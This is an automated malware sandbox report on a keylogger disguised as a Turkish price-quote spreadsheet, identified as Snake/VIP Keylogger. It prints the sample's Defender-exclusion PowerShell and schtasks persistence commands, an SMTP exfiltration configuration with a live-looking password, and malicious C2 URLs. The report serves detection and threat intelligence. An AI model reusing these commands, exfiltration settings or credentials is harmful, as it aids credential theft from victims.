Edit tour

Windows Analysis Report
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Overview

General Information

Sample name:	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe renamed because original name is a hash value
Original sample name:	TEKLF TALEP VE FYAT TEKLF_xlsx.exe
Analysis ID:	1528049
MD5:	2cc0d4388df2a7acfae0a9dc3cceb3b5
SHA1:	63918ef85e4ee9d01edd4c0304e6f9682f90ee00
SHA256:	c3bc0f624964efbdb410648c80ed1357b28f293ce0d0c7602fcae852e37ad918
Tags:	exegeoMassLoggerTURuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe (PID: 7464 cmdline: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe" MD5: 2CC0D4388DF2A7ACFAE0A9DC3CCEB3B5)

powershell.exe (PID: 7680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7736 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 8076 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7808 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe (PID: 7944 cmdline: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe" MD5: 2CC0D4388DF2A7ACFAE0A9DC3CCEB3B5)

YzkHZRBcm.exe (PID: 8040 cmdline: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe MD5: 2CC0D4388DF2A7ACFAE0A9DC3CCEB3B5)

schtasks.exe (PID: 7208 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpB2D1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

YzkHZRBcm.exe (PID: 6504 cmdline: "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe" MD5: 2CC0D4388DF2A7ACFAE0A9DC3CCEB3B5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e610:$a1: get_encryptedPassword 0x71630:$a1: get_encryptedPassword 0xb4450:$a1: get_encryptedPassword 0x2eb98:$a2: get_encryptedUsername 0x71bb8:$a2: get_encryptedUsername 0xb49d8:$a2: get_encryptedUsername 0x2e283:$a3: get_timePasswordChanged 0x712a3:$a3: get_timePasswordChanged 0xb40c3:$a3: get_timePasswordChanged 0x2e39a:$a4: get_passwordField 0x713ba:$a4: get_passwordField 0xb41da:$a4: get_passwordField 0x2e626:$a5: set_encryptedPassword 0x71646:$a5: set_encryptedPassword 0xb4466:$a5: set_encryptedPassword 0x31342:$a6: get_passwords 0x74362:$a6: get_passwords 0xb7182:$a6: get_passwords 0x316d6:$a7: get_logins 0x746f6:$a7: get_logins 0xb7516:$a7: get_logins
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x28e26:$a1: get_encryptedPassword 0x293a4:$a2: get_encryptedUsername 0x28aa8:$a3: get_timePasswordChanged 0x28bbf:$a4: get_passwordField 0x28e3c:$a5: set_encryptedPassword 0x2bb00:$a6: get_passwords 0x2be90:$a7: get_logins 0x2baec:$a8: GetOutlookPasswords 0x2b4a5:$a9: StartKeylogger 0x2bde9:$a10: KeyLoggerEventArgs 0x2b545:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7944	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7944	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: YzkHZRBcm.exe PID: 6504	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: YzkHZRBcm.exe PID: 6504	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: YzkHZRBcm.exe PID: 6504	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
14.2.YzkHZRBcm.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.YzkHZRBcm.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.YzkHZRBcm.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.YzkHZRBcm.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b2ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a951:$a3: \Google\Chrome\User Data\Default\Login Data 0x3abae:$a4: \Orbitum\User Data\Default\Login Data 0x3b58d:$a5: \Kometa\User Data\Default\Login Data
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x394ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b51:$a3: \Google\Chrome\User Data\Default\Login Data 0x38dae:$a4: \Orbitum\User Data\Default\Login Data 0x3978d:$a5: \Kometa\User Data\Default\Login Data
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x394ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b51:$a3: \Google\Chrome\User Data\Default\Login Data 0x38dae:$a4: \Orbitum\User Data\Default\Login Data 0x3978d:$a5: \Kometa\User Data\Default\Login Data
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70ac0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71048:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70733:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x7084a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70ad6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x737f2:$a6: get_passwords 0x30d66:$a7: get_logins 0x73b86:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x737de:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x73197:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x73adf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x71e84:$s1: UnHook 0x2f06b:$s2: SetHook 0x71e8b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x71e93:$s3: CallNextHook 0x2f080:$s4: _hook 0x71ea0:$s4: _hook
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70cc0:$a1: get_encryptedPassword 0xb3ae0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71248:$a2: get_encryptedUsername 0xb4068:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70933:$a3: get_timePasswordChanged 0xb3753:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x70a4a:$a4: get_passwordField 0xb386a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70cd6:$a5: set_encryptedPassword 0xb3af6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x739f2:$a6: get_passwords 0xb6812:$a6: get_passwords 0x30d66:$a7: get_logins 0x73d86:$a7: get_logins 0xb6ba6:$a7: get_logins
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x72084:$s1: UnHook 0xb4ea4:$s1: UnHook 0x2f06b:$s2: SetHook 0x7208b:$s2: SetHook 0xb4eab:$s2: SetHook 0x2f073:$s3: CallNextHook 0x72093:$s3: CallNextHook 0xb4eb3:$s3: CallNextHook 0x2f080:$s4: _hook 0x720a0:$s4: _hook 0xb4ec0:$s4: _hook
Click to see the 23 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ParentProcessId: 7464, ParentProcessName: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", ProcessId: 7680, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpB2D1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpB2D1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe, ParentImage: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe, ParentProcessId: 8040, ParentProcessName: YzkHZRBcm.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpB2D1.tmp", ProcessId: 7208, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ParentProcessId: 7464, ParentProcessName: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp", ProcessId: 7808, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ParentProcessId: 7464, ParentProcessName: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", ProcessId: 7680, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ParentProcessId: 7464, ParentProcessName: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp", ProcessId: 7808, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T14:52:23.791314+0200	2803305	3	Unknown Traffic	192.168.2.7	49740	188.114.96.3	443	TCP
2024-10-07T14:52:27.624268+0200	2803305	3	Unknown Traffic	192.168.2.7	49776	188.114.96.3	443	TCP
2024-10-07T14:52:27.627534+0200	2803305	3	Unknown Traffic	192.168.2.7	49775	188.114.96.3	443	TCP
2024-10-07T14:52:30.226508+0200	2803305	3	Unknown Traffic	192.168.2.7	49798	188.114.96.3	443	TCP
2024-10-07T14:52:30.327723+0200	2803305	3	Unknown Traffic	192.168.2.7	49800	188.114.96.3	443	TCP
2024-10-07T14:52:31.531374+0200	2803305	3	Unknown Traffic	192.168.2.7	49812	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T14:52:22.045890+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49722	132.226.247.73	80	TCP
2024-10-07T14:52:23.327263+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49722	132.226.247.73	80	TCP
2024-10-07T14:52:24.606098+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49744	132.226.247.73	80	TCP
2024-10-07T14:52:26.327433+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49758	132.226.247.73	80	TCP
2024-10-07T14:52:27.061563+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49758	132.226.247.73	80	TCP
2024-10-07T14:52:28.436531+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49783	132.226.247.73	80	TCP
2024-10-07T14:52:29.764691+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49796	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Found malware configuration

Source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
